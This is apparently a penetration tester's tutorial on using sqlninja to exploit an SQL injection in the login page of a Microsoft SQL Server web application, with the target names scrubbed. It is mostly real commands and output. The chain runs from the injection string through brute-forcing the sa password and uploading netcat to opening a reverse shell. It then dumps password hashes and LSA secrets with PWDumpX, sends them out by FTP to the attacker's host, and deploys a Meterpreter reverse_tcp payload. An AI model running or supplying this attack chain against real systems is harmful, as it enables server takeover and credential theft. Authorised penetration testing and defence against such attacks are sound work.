
SQLNINJA

From the site:


Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.
SQLNinja (http://sqlninja.sourceforge.net/index.html)
Demo (http://sqlninja.sourceforge.net/sqlninjademo.html)
Documentation (http://sqlninja.sourceforge.net/sqlninja-howto.html)
That more than sums up what the tool is used for. This document will go into the experiences I have had using the tool successfully during a penetration test. The results shown are real world examples with the sensitive information scrubbed to protect the innocent. This document will also deal with installation of SQLninja on an Ubuntu 8.04 LTS Hardy Heron system.

SQLNinja is a perl script that requires a number of perl libraries to function properly. I installed these libraries using CPAN (www.cpan.org). The use of CPAN is outside the scope of this document.
#perl -MCPAN -e 'install NetPacket'
#apt-get install libpcap0.8 libpcap0.8-dev
#perl -MCPAN -e 'install Net::Pcap'
#perl -MCPAN -e 'install Net::DNS'
#perl -MCPAN -e 'install Net::RawIP'
#perl -MCPAN -e 'install IO::Socket::SSL'
#wget http://downloads.sourceforge.net/sqlninja/sqlninja-0.2.3-r1.tgz
#tar zxvf sqlninja-0.2.3-r1.tgz
#cd sqlninja-0.2.3-r1
The first thing you will want to do is run a test against your target. If you do not have a sqlninja.conf file from a previous test in the folder, you will be asked for information regarding the target so that the configuration file can be created and an attack conducted.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -m test
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[-] sqlninja.conf does not exist. You want to create it now ? [y/n]
> y
[+] Creating a new configuration file. Keep in mind that only basic options
will be generated, and that the file should be manually edited for advanced
options and fine tuning.
[1/10] Victim host (e.g.: www.victim.com):
> state.govt.agency.us
[2/10] Remote port [80]
> 443
[3/10] Use SSL (y/n/auto) [auto]
> y
[4/10] Method to use (GET/POST) [GET]
> POST
[5/10] Vulnerable page, including path and leading slash
(e.g.: /dir/target.asp)
> /APPLICATION/Folder/AuthenticationPage.asp
[6/10] Start of the exploit string. It must include the vulnerable parameter
and the character sequence that allows us to start injecting commands. In
general this means, at least:
- an apostrophe (if the parameter is a string)
- a semicolon (to end the original query)
It must also include everything necessary to properly close the original
query, as an appropriate number of closing brackets. Don't forget to
URL-encode, where needed (e.g.: spaces).
For instance, if we consider the following TSQL command:
exec master..xp_cmdshell 'dir c:\'
and the string to inject is the following:
aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'
this parameter should look like this:
aaa=1&bbb=x';
> Submit=Submit&Password=pwned&UserName=auditor'
[7/10] If you need to add some more parameters after the vulnerable one, put
them here (don't forget the leading "&" sign and to URL-encode where needed).
e.g.: &param3=aaa
>
[8/10] Local host: your IP address (for backscan and revshell modes)
> 192.168.0.1
[9/10] Interface to sniff when in backscan mode
> eth0
[10/10] Evasion techniques. Possible choices are:
1 - Query hex-encoding
2 - Comments as separators
3 - Random case
4 - Random URI encoding
All techniques can be combined, so for instance you can enter "1234" (without
quotes). However, keep in mind that using too many techniques at once leads to
very long queries, that might create problems when using GET.
Default: 0 (no evasion)
>
[+] sqlninja.conf written successfully
[+] Parsing configuration file................
[+] Target is: state.govt.agency.us
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)
In this particular instance the SQL Injection vulnerability is in the login page of the application. After you have confirmed that SQL Injection is possible and SQLNinja is configured correctly you can begin fingerprinting the backend database.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -m fingerprint
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Target is: state.govt.agency.us
What do you want to discover ?
0 - Database version (2000/2005)
1 - Database user
2 - Database user rights
3 - Whether xp_cmdshell is working
4 - Whether mixed or Windows-only authentication is used
a - All of the above
h - Print this menu
q - exit
> 0
[+] Checking SQL Server version...
Target: Microsoft SQL Server 2000
> 1
[+] Checking whether we are sysadmin...
No, we are not 'sa'.... :(
[+] Finding dbuser length...
Got it ! Length = 11
[+] Now going for the characters........
DB User is....: APPLICATION
> 2
[+] Checking whether user is member of sysadmin server role....
You are not an administrator. If you tried escalating already, it might be
that you are using old ODBC connections. Check the documentation
for how to deal with this
> 3
[+] Checking whether xp_cmdshell is available
xp_cmdshell doesn't seem to be available
> 4
Mixed authentication seems to be used
> q
We are not the sa (MSSQL Administrator) user but instead are the user APPLICATION and do not have administrative rights on the database. Please see another tutorial I have created for the SQL Injection tool automagic on how to extract the data from the database with the user APPLICATION. The fact that the database uses Mixed authentication mode allows us to conduct a dictionary attack to identify the sa password.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -v -m bruteforce -w pass.txt
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
- Host: state.govt.agency.us
- Port: 443
- SSL: yes
- method: POST
- page: /APPLICATION/Folder/AuthenticationPage.asp
- stringstart: Submit=Submit&Password=pwned&UserName=auditor'
- stringend:
- local host: 192.168.0.1
- sniff device: eth0
- domain: sqlninja.net
[v] SSL connection forced
[+] Target is: state.govt.agency.us
[+] Wordlist has been specified: using dictionary-based bruteforce
Number of concurrent processes [min:1 max:10 default:3]
> 1
[v] Creating UNIX socket for children messages
[v] Launching children processes
[+] Bruteforcing the sa password. This might take a while
dba password is...: servername
bruteforce took 80 seconds
[+] Trying to add current user to sysadmin group
[+] Done! New connections will be run with administrative privileges! In case
the server uses ODBC, you might have to wait a little bit
(check sqlninja-howto.html)
As you can see from the results the sa password was the name of the server. Tisk, tisk! SQLninja does not have a check for the name of the server you are attacking. I obtained this by running a manual query against the application.
and 1 in (select @@servername)--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'SERVERNAME' to a column of data type int.
/APPLICATION/Folder/AuthenticationPage.asp, line 36
We will run the fingerprint option again to confirm that we are a database administrative user and to see if xp_cmdshell is enabled.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -m fingerprint
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Target is: state.govt.agency.us
What do you want to discover ?
0 - Database version (2000/2005)
1 - Database user
2 - Database user rights
3 - Whether xp_cmdshell is working
4 - Whether mixed or Windows-only authentication is used
a - All of the above
h - Print this menu
q - exit
> 2
[+] Checking whether user is member of sysadmin server role....
You are an administrator !
> 3
[+] Checking whether xp_cmdshell is available
xp_cmdshell seems to be available :)
> q
We are a database administrator and xp_cmdshell is available, as is the default for Microsoft SQL Server 2000. Using the SQL Injection vulnerability and xp_cmdshell we can upload a file provided by SQLNinja. The file provided is NetCat (nc.exe as nc.scr) that has been pre-parsed by a provided perl script so that it can be uploaded line by line through the SQL Injection vulnerability. Once uploaded, the NetCat program is put back together by the debug.exe command found on the host.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -m upload
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Target is: state.govt.agency.us
File to upload:
shortcuts: 1=scripts/nc.scr 2=scripts/dnstun.scr
> 1
[+] Uploading scripts/nc.scr debug script............
1540/1540 lines written
done !
[+] Converting script to executable... might take a while
[+] Checking whether nc.exe is there...
[+] nc.exe seems to be there... enjoy! :)
The database server did not have anti-virus software installed so the upload of NetCat was successful. However, if the server did have anti-virus installed there is a document that can be found online on how to take back NetCat (www.packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf). You can take your modified NetCat executable and create the necessary script to be uploaded by SQLNinja using a perl script provided with the utility. That script, makescr.pl, found in the root of the SQLNinja folder, takes the exe and produces the proper scr file that can be uploaded through the SQL Injection vulnerability and put back to the original exe on the host using the debug.exe command.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./makescr.pl
sqlninja debug script generator
Copyright (C) 2008 icesurfer <r00t@northernfortress.net>
Usage: ./makescr.pl -i <input file> [-o <output file>]
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./makescr.pl -i nc.edge.exe -o nc.scr
sqlninja debug script generator
Copyright (C) 2008 icesurfer <r00t@northernfortress.net>
Debug script created successfully
root@edge-linuxpen:~/sqlninja-0.2.3-r1# mv scripts/nc.scr scripts/nc.scr.sv
root@edge-linuxpen:~/sqlninja-0.2.3-r1# mv nc.scr scripts
Just upload the new NetCat script. Once the script is uploaded you can then use the SQLNinja backscan option to find an open port that the SQL server communicates out to the internet with. However, for me this did not work, so please rely on the demo found on the SQLNinja website for how the command works. I manually tried three of the most common ports that a server would communicate out to the internet with (udp 53, tcp 80, & tcp 443). We will now create a reverse shell back to our host.
root@edge-linuxpen:~/Desktop/sqlninja-0.2.3-r1# ./sqlninja -v -m revshell
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
- Host: state.govt.agency.us
- Port: 443
- SSL: yes
- method: POST
- page: /APPLICATION/Folder/AuthenticationPage.asp
- stringstart: Submit=Submit&Password=pwned&UserName=auditor'
- stringend:
- local host: 192.168.0.1
- sniff device: eth0
- domain: sqlninja.net
[v] SSL connection forced
[+] Target is: state.govt.agency.us
[v] Starting revshell module
Local port: 443
tcp/udp [default: tcp]: tcp
[v] Starting listener process
[v] Creating local listening tcp socket
[+] waiting for shell on port 443/tcp...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
whoami
SERVERNAME\Administrator
You have successfully taken over the backend database server using a SQL Injection vulnerability found in a web application. Below is what I did to acquire the password hashes on the server so I can crack some passwords and hopefully dig further into the agency. The first thing we need to do is get the PWDumpX application uploaded to the server. I create the necessary scripts to be uploaded using the perl script provided.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./makescr.pl -i PWDumpX.exe -o PWDumpX.scr
sqlninja debug script generator
Copyright (C) 2008 icesurfer <r00t@northernfortress.net>
Debug script created successfully
root@edge-linuxpen:~/sqlninja-0.2.3-r1# mv PWDumpX.scr scripts
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./makescr.pl -i DumpSvc.exe -o DumpSvc.scr
sqlninja debug script generator
Copyright (C) 2008 icesurfer <r00t@northernfortress.net>
Debug script created successfully
root@edge-linuxpen:~/sqlninja-0.2.3-r1# mv DumpSvc.scr scripts
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./makescr.pl -i DumpExt.dll -o DumpExt.scr
sqlninja debug script generator
Copyright (C) 2008 icesurfer <r00t@northernfortress.net>
Debug script created successfully
root@edge-linuxpen:~/sqlninja-0.2.3-r1# mv DumpExt.scr scripts
I then upload them using SQLNinja.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -v -m upload
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
- Host: state.govt.agency.us
- Port: 443
- SSL: yes
- method: POST
- page: /APPLICATION/Folder/AuthenticationPage.asp
- stringstart: Submit=Submit&Password=pwned&UserName=auditor
- stringend:
- local host: 192.168.0.1
- sniff device: eth0
- domain: sqlninja.net
[v] SSL connection forced
[+] Target is: state.govt.agency.us
File to upload:
shortcuts: 1=scripts/nc.scr 2=scripts/dnstun.scr
> scripts/DumpSvc.scr
[v] Starting upload module
[v] Deleting any previous instance of the file...
[+] Uploading scripts/DumpSvc.scr debug script............
888/31[-] Warning... the server responded with HTTP/1.1 500 Internal Server
Error
Check configuration, as things might not be working as expected !
3164/3164 lines written
done !
[v] Checking number of uploaded lines
[v] DumpSvc.scr seems to have been properly uploaded
[+] Converting script to executable... might take a while
[v] Removing the original scr file
[+] Checking whether DumpSvc.exe is there...
[+] DumpSvc.exe seems to be there... enjoy! :)
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -v -m upload
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
- Host: state.govt.agency.us
- Port: 443
- SSL: yes
- method: POST
- page: /APPLICATION/Folder/AuthenticationPage.asp
- stringstart: Submit=Submit&Password=pwned&UserName=auditor
- stringend:
- local host: 192.168.0.1
- sniff device: eth0
- domain: sqlninja.net
[v] SSL connection forced
[+] Target is: state.govt.agency.us
File to upload:
shortcuts: 1=scripts/nc.scr 2=scripts/dnstun.scr
> scripts/PWDumpX.scr
[v] Starting upload module
[v] Deleting any previous instance of the file...
[+] Uploading scripts/PWDumpX.scr debug script............
3990/3990 lines written
done !
[v] Checking number of uploaded lines
[v] PWDumpX.scr seems to have been properly uploaded
[+] Converting script to executable... might take a while
[v] Removing the original scr file
[+] Checking whether PWDumpX.exe is there...
[+] PWDumpX.exe seems to be there... enjoy! :)
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -v -m upload
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
- Host: state.govt.agency.us
- Port: 443
- SSL: yes
- method: POST
- page: /APPLICATION/Folder/AuthenticationPage.asp
- stringstart: Submit=Submit&Password=pwned&UserName=auditor
- stringend:
- local host: 192.168.0.1
- sniff device: eth0
- domain: sqlninja.net
[v] SSL connection forced
[+] Target is: state.govt.agency.us
File to upload:
shortcuts: 1=scripts/nc.scr 2=scripts/dnstun.scr
> scripts/DumpExt.scr
[v] Starting upload module
[v] Deleting any previous instance of the file...
[+] Uploading scripts/DumpExt.scr debug script............
3729/3729 lines written
done !
[v] Checking number of uploaded lines
[v] DumpExt.scr seems to have been properly uploaded
[+] Converting script to executable... might take a while
[v] Removing the original scr file
[+] Checking whether DumpExt.exe is there...
[+] DumpExt.exe seems to be there... enjoy! :)
Once the files are uploaded I create a reverse shell connection, rename DumpExt.exe to DumpExt.dll and run PWDumpX. Note, all files uploaded by SQLNinja are placed in the %TEMP% directory.
C:\WINNT\system32>cd %TEMP%
cd %TEMP%
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0000-0001
 Directory of C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
05/28/2009 07:03a <DIR> .
05/28/2009 07:03a <DIR> ..
05/28/2009 07:03a 37,364 DumpExt.exe
05/28/2009 07:01a 24,400 DumpSvc.exe
05/27/2009 03:03p 30,720 nc.exe
05/28/2009 07:03a 32,813 PWDumpX.exe
x File(s) xxx,xxx bytes
x Dir(s) x,xxx,xxx,xxx bytes free
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>move DumpExt.exe DumpExt.dll
move DumpExt.exe DumpExt.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>pwdumpx
pwdumpx
PWDumpX v1.4 | http://reedarvin.thearvins.com/
Usage: PWDumpX [-clph] <hostname | ip input file> <username> <password>
[-clph] -- optional argument
<hostname | ip input file> -- required argument
<username> -- required argument
<password> -- required argument
-c -- Dump Password Cache
-l -- Dump LSA Secrets
-p -- Dump Password Hashes
-h -- Dump Password History Hashes
If the <username> and <password> arguments are both plus signs (+), the
existing credentials of the user running this utility will be used.
Examples:
PWDumpX 10.10.10.10 + +
PWDumpX 10.10.10.10 administrator password
PWDumpX -lp MyWindowsMachine + +
PWDumpX -lp MyWindowsMachine administrator password
PWDumpX -clph IPInputFile.txt + +
PWDumpX -clph IPInputFile.txt administrator password
(Written by Reed Arvin | reedarvin@gmail.com)
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>pwdumpx -clph 127.0.0.1 + +
pwdumpx -clph 127.0.0.1 + +
Running PWDumpX v1.4 with the following arguments:
[+] Host Input: "127.0.0.1"
[+] Username: "+"
[+] Password: "+"
[+] Arguments: "-clph"
[+] # of Threads: "64"
Waiting for PWDumpX service to terminate on host 127.0.0.1.
Retrieved file 127.0.0.1-PWCache.txt
Retrieved file 127.0.0.1-LSASecrets.txt
Retrieved file 127.0.0.1-PWHashes.txt
Retrieved file 127.0.0.1-PWHistoryHashes.txt
At this point the text files are created and I just print them to the screen using the more command to copy and paste the text to my laptop.
Advanced Techniques

While I had access I documented additional ways that SQLNinja can be used to control a backend database server through SQL Injection. I also documented easier ways to upload PWDumpX without having to resort to using SQLNinja.

Below we create an FTP script and use it to connect to an FTP server we control. We GET the PWDumpX program, run it, and PUT the output to our machine. Configuring an FTP server is outside the scope of this document.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -m revshell
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Target is: state.govt.agency.us
Local port: 80
tcp/udp [default: tcp]: tcp
[+] waiting for shell on port 80/tcp...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>cd\
cd\
C:\>echo OPEN 192.168.0.1 >> ftp.txt
echo OPEN 192.168.0.1 >> ftp.txt
C:\>echo bin >> ftp.txt
echo bin >> ftp.txt
C:\>echo GET PWDumpX.exe >> ftp.txt
echo GET PWDumpX.exe >> ftp.txt
C:\>echo GET DumpSvc.exe >> ftp.txt
echo GET DumpSvc.exe >> ftp.txt
C:\>echo GET DumpExt.dll >> ftp.txt
echo GET DumpExt.dll >> ftp.txt
C:\>echo bye >> ftp.txt
echo bye >> ftp.txt
C:\>ftp -A -s:ftp.txt
ftp -A -s:ftp.txt
Anonymous login succeeded for Administrator@servername.state.govt.agency.us
OPEN 192.168.0.1
bin
GET PWDumpX.exe
GET DumpSvc.exe
GET DumpExt.dll
bye
C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0000-0001
 Directory of C:\
02/09/2009 05:16p <DIR> Documents and Settings
05/29/2009 10:41a 37,364 DumpExt.dll
05/29/2009 10:41a 24,400 DumpSvc.exe
05/29/2009 10:35a 115 ftp.txt
05/27/2009 06:37a <DIR> Program Files
05/29/2009 10:41a 32,813 PWDumpX.exe
11/16/2005 08:25a <DIR> Temp
05/27/2009 06:37a <DIR> WINNT
x File(s) xxx,xxx bytes
x Dir(s) x,xxx,xxx,xxx bytes free
C:\>PWDumpX.exe -clph 127.0.0.1 + +
PWDumpX.exe -clph 127.0.0.1 + +
Running PWDumpX v1.4 with the following arguments:
[+] Host Input: "127.0.0.1"
[+] Username: "+"
[+] Password: "+"
[+] Arguments: "-clph"
[+] # of Threads: "64"
Waiting for PWDumpX service to terminate on host 127.0.0.1.
Retrieved file 127.0.0.1-PWCache.txt
Retrieved file 127.0.0.1-LSASecrets.txt
Retrieved file 127.0.0.1-PWHashes.txt
Retrieved file 127.0.0.1-PWHistoryHashes.txt
C:\>del ftp.txt
del ftp.txt
C:\>echo OPEN 192.168.0.1 >> ftp.txt
echo OPEN 192.168.0.1 >> ftp.txt
C:\>echo CD files >> ftp.txt
echo CD files >> ftp.txt
C:\>echo PUT 127.0.0.1-PWCache.txt >> ftp.txt
echo PUT 127.0.0.1-PWCache.txt >> ftp.txt
C:\>echo PUT 127.0.0.1-LSASecrets.txt >> ftp.txt
echo PUT 127.0.0.1-LSASecrets.txt >> ftp.txt
C:\>echo PUT 127.0.0.1-PWHashes.txt >> ftp.txt
echo PUT 127.0.0.1-PWHashes.txt >> ftp.txt
C:\>echo PUT 127.0.0.1-PWHistoryHashes.txt >> ftp.txt
echo PUT 127.0.0.1-PWHistoryHashes.txt >> ftp.txt
C:\>echo bye >> ftp.txt
echo bye >> ftp.txt
C:\>ftp -A -s:ftp.txt
ftp -A -s:ftp.txt
Anonymous login succeeded for Administrator@servername.state.govt.agency.us
OPEN 192.168.0.1
CD files
PUT 127.0.0.1-PWCache.txt
PUT 127.0.0.1-LSASecrets.txt
PUT 127.0.0.1-PWHashes.txt
PUT 127.0.0.1-PWHistoryHashes.txt
bye
C:\>
Metasploit

The documentation for the metasploit option of SQLNinja explains what the utility does to include Metasploit functionality. Please read it here (http://sqlninja.sourceforge.net/sqlninja-howto.html#ss2.11).
NOTE: When using SQLNinja to upload and launch the Metasploit payload I noticed that the SQL Injection command to run the uploaded payload would take place before Metasploit had enough time to load. I have no idea if Metasploit takes a while to load on other users' systems, but in case it does I modified the SQLNinja code to allow more time to go by before the SQL Injection command to execute the payload is sent. Lines 3301-3305 of sqlninja contain an if statement with some delay variables. I just changed them from 5 to 25, allowing enough time for Metasploit to load when it is called by the script.
root@edge-linuxpen:~/sqlninja-0.2.3-r1# ./sqlninja -v -m metasploit
Sqlninja rel. 0.2.3-r1
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
- Host: state.govt.agency.us
- Port: 443
- SSL: yes
- method: POST
- page: /TAAURA/Non_Compliance_Entry/TAAURALoginResp.asp
- stringstart: Submit=Submit&Password=pwned&UserName=auditor
- stringend:
- local host: 192.168.0.1
- sniff device: eth0
- domain: sqlninja.net
[v] SSL connection forced
[+] Target is: state.govt.agency.us
[+] Entering Metasploit module. In order to use this module you need to
have found an available TCP port, either inbound or outbound
[+] Checking Metasploit3 availability....
[+] Which payload you want to use?
1: Meterpreter
2: VNC
> 1
[+] Which type of connection you want to use?
1: bind_tcp
2: reverse_tcp
> 2
[+] Enter local port number
> 443
[+] Choose a payload encoding method
0 - none
1 - Alpha2 Alphanumeric Mixedcase
2 - Alpha2 Alphanumeric Uppercase
3 - Avoid UTF8/tolower
4 - Call+4 Dword XOR
5 - Single-byte XOR Countdown
6 - Variable-length Fnstenv/mov Dword XOR
7 - Polymorphic Jump/Call XOR Additive Feedback
8 - Non-Alpha
9 - Non-Upper
10 - Polymorphic XOR Additive Feedback
11 - Alpha2 Alphanumeric Unicode Mixedcase
12 - Alpha2 Alphanumeric Unicode Uppercase
> 0
[v] Command: /home/edge/trunk/msfpayload windows/meterpreter/reverse_tcp
exitfunc=process lport=443 lhost=192.168.0.1 X > /tmp/met5190.exe
[+] Calling msfpayload3 to create the payload...
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: exitfunc=process,lport=443,lhost=192.168.0.1
[+] Payload (met5190.exe) created. Now converting it to debug script
[v] Starting upload module
[v] Deleting any previous instance of the file...
[+] Uploading /tmp/met5190.scr debug script............
113/113 lines written
done !
[v] Checking number of uploaded lines
[v] met5190.scr seems to have been properly uploaded
[+] Converting script to executable... might take a while
[v] Removing the original scr file
[+] Checking whether met5190.exe is there...
[+] met5190.exe seems to be there... enjoy! :)
[+] Checking if DEP (Data Execution Prevention) is enabled on target
[+] No DEP detected.... good
[v] Executing: /home/edge/trunk/msfcli multi/handler
payload=windows/meterpreter/reverse_tcp lport=443 lhost=192.168.0.1 E
[+] Transferring control to msfcli. Have fun!
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.1:443 -> xxx.xxx.xxx.xxx:24765)
meterpreter >
meterpreter > upload /home/edge/downloads/pwdumpx/DumpExt.dll c:\
[*] uploading  : /home/edge/downloads/pwdumpx/DumpExt.dll -> c:\
[*] uploaded   : /home/edge/downloads/pwdumpx/DumpExt.dll -> c:\\DumpExt.dll
meterpreter > /home/edge/downloads/pwdumpx/DumpSvc.exe c:\
[-] Unknown command: /home/edge/downloads/pwdumpx/DumpSvc.exe.
meterpreter > upload /home/edge/downloads/pwdumpx/DumpSvc.exe c:\
[*] uploading  : /home/edge/downloads/pwdumpx/DumpSvc.exe -> c:\
[*] uploaded   : /home/edge/downloads/pwdumpx/DumpSvc.exe -> c:\\DumpSvc.exe
meterpreter > upload /home/edge/downloads/pwdumpx/PWDumpX.exe c:\
[*] uploading  : /home/edge/downloads/pwdumpx/PWDumpX.exe -> c:\
[*] uploaded   : /home/edge/downloads/pwdumpx/PWDumpX.exe -> c:\\PWDumpX.exe
meterpreter > execute -f cmd -c
Process 9428 created.
Channel 6 created.
meterpreter > interact 6
Interacting with channel 6...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>cd\
cd\
C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0000-0001
 Directory of C:\
02/09/2009 05:16p <DIR> Documents and Settings
05/29/2009 08:49a 37,364 DumpExt.dll
05/29/2009 08:49a 24,400 DumpSvc.exe
05/27/2009 06:37a <DIR> Program Files
05/29/2009 08:49a 32,813 PWDumpX.exe
11/16/2005 08:25a <DIR> Temp
05/27/2009 06:37a <DIR> WINNT
xx File(s) x,xxx,xxx bytes
x Dir(s) x,xxx,xxx,xxxx bytes free
C:\>pwdumpx -clph 127.0.0.1 + +
pwdumpx -clph 127.0.0.1 + +
Running PWDumpX v1.4 with the following arguments:
[+] Host Input: "127.0.0.1"
[+] Username: "+"
[+] Password: "+"
[+] Arguments: "-clph"
[+] # of Threads: "64"
Waiting for PWDumpX service to terminate on host 127.0.0.1..
Retrieved file 127.0.0.1-PWCache.txt
Retrieved file 127.0.0.1-LSASecrets.txt
Retrieved file 127.0.0.1-PWHashes.txt
Retrieved file 127.0.0.1-PWHistoryHashes.txt
C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0000-0001
 Directory of C:\
05/29/2009 08:51a 6,436 127.0.0.1-LSASecrets.txt
05/29/2009 08:51a 451 127.0.0.1-PWCache.txt
05/29/2009 08:51a 667 127.0.0.1-PWHashes.txt
05/29/2009 08:51a 667 127.0.0.1-PWHistoryHashes.txt
02/09/2009 05:16p <DIR> Documents and Settings
05/29/2009 08:49a 37,364 DumpExt.dll
05/29/2009 08:49a 24,400 DumpSvc.exe
05/27/2009 06:37a <DIR> Program Files
05/29/2009 08:49a 32,813 PWDumpX.exe
11/16/2005 08:25a <DIR> Temp
05/27/2009 06:37a <DIR> WINNT
xx File(s) x,xxx,xxx bytes
x Dir(s) x,xxx,xxx,xxx bytes free
C:\>exit
exit
meterpreter > download c:\\127.0.0.1-LSASecrets.txt 127.0.0.1-LSASecrets.txt
[*] downloading: c:\127.0.0.1-LSASecrets.txt -> 127.0.0.1-LSASecrets.txt
[*] downloaded : c:\127.0.0.1-LSASecrets.txt -> 127.0.0.1-LSASecrets.txt
meterpreter > download c:\\127.0.0.1-PWCache.txt 127.0.0.1-PWCache.txt
[*] downloading: c:\127.0.0.1-PWCache.txt -> 127.0.0.1-PWCache.txt
[*] downloaded : c:\127.0.0.1-PWCache.txt -> 127.0.0.1-PWCache.txt
meterpreter > download c:\\127.0.0.1-PWHistoryHashes.txt 127.0.0.1-PWHistoryHashes.txt
[*] downloading: c:\127.0.0.1-PWHistoryHashes.txt -> 127.0.0.1-PWHistoryHashes.txt
[*] downloaded : c:\127.0.0.1-PWHistoryHashes.txt -> 127.0.0.1-PWHistoryHashes.txt
meterpreter >
The VNC payload option looks awesome. You can view the demo (http://sqlninja.sourceforge.net/sqlninjademo.html) from the sqlninja website to see it in action. It worked for me but also didn't work for me. The VNC payload was uploaded and launched successfully, but once the VNC window opened all I saw was a black screen and a mouse pointer. My guess is the connection was too slow to register the mouse movements and screen refresh. Your mileage will vary (and hopefully be more successful).
